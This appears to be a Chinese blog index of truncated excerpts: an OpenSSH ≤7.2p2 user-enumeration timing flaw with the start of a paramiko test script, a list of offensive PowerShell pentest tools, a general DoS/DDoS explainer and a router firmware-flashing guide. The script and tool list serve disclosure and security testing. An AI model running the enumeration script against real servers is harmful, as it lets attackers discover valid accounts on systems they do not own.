该漏洞在opensshd-7.2p2 中被发现,但是安全人员指出,该漏洞应该在更早的版本中已经存在。 漏洞描述  当我们使用ssh客户端去连接服务端的时候,如果向服务端发送一个大于10KB的密码,由于OpenSSH服务端会对user:password的组合,使用加密算法SHA256/SHA512进行加密。  如果我们传输的是一个不存在的用户名,那么就不会进入sha256(user,password)加密流程,如果 用户名存在 ,服务器将会针对这个10KB大的密码进行SHA256的加密,这里就会产生时间差。 影响范围 OpenSSH <=OpenSSH 7.2p2 测试python脚本如下(code from HackBraid): import paramiko import time user=raw_input("user: ") p='A'*25000 ssh = paramiko.SSHClient() starttime=time.time() ssh.set_…


转自saline http://0cx.cc/tools-for-PowerShell.jspx UnmanagedPowerShell : https://github.com/leechristensen/UnmanagedPowerShell 可以从一个非托管程序来执行PowerShell , 经过一些修改后也可以被用来注入到其他进程。 Throwback:https://github.com/silentbreaksec/Throwback HTTP/S 标记注入 ThrowbackLP:https://github.com/silentbreaksec/ThrowbackLP 监听站反向注入 CrackMapExec:https://github.com/byt3bl33d3r/CrackMapExec Windows/Active Directory环境下的一站式渗透测试 PowerShellMafia:https://github.com/PowerShellMafia/PowerSploit PowerSploit 是Microsoft中能够帮助渗透人员在所有阶段进行评估的PowerShell模块集。 nishang:https://github.…


拒绝服务 拒绝服务(DoS)是一种 “老牌” 服务器攻击。这种攻击很简单,通常由技术水平较低的被称为脚本小子(script kiddies)的年轻人发动此类攻击。总体而言,DoS 攻击通过一个系统攻击另一个系统,其目的是消耗后者的所有资源(比如带宽和处理器时间),从而无法进行合法请求。通常,我们认为这是一种无聊的攻击,但您一定不要因此放松警惕,因为它造成的许多问题会让您半夜睡不着觉。 分布式拒绝服务 分布式拒绝服务(DDoS)攻击是 DoS 攻击的增强版,因为它更加恶劣、更加恼人。DDoS 攻击的目标和 DoS 一样,但它的规模更大,也更加复杂。在 DDoS 攻击中,攻击者不是通过一个系统攻击另一个系统,而是使用多个系统攻击另一个系统,有时这种发出攻击的系统甚至多达几十万个。如果说 DoS 攻击仅会让人感觉讨厌的话,那么 DDoS 攻击则是致命的,因为它能迅速使服务器离线。不过,实施…


极路由最新固件太不稳定了,看网上都说华硕固件稳定,我也准备刷了! 设备:极路由1s(5661) 一、准备工作 首先按照帖子:http://bbs.hiwifi.com/thread-82822-1-1.html 申请root权限。 二、解决SFTP 然后进入SFTP,发现无法连接,操作命令: mount -o remount, rw / wget http://downloads.openwrt.org.cn/PandoraBox/ralink/packages/packages/openssh-sftp-server_6.6p1-1_ralink.ipk tar zxvf openssh-sftp-server_6.6p1-1_ralink.ipk tar zxvf data.…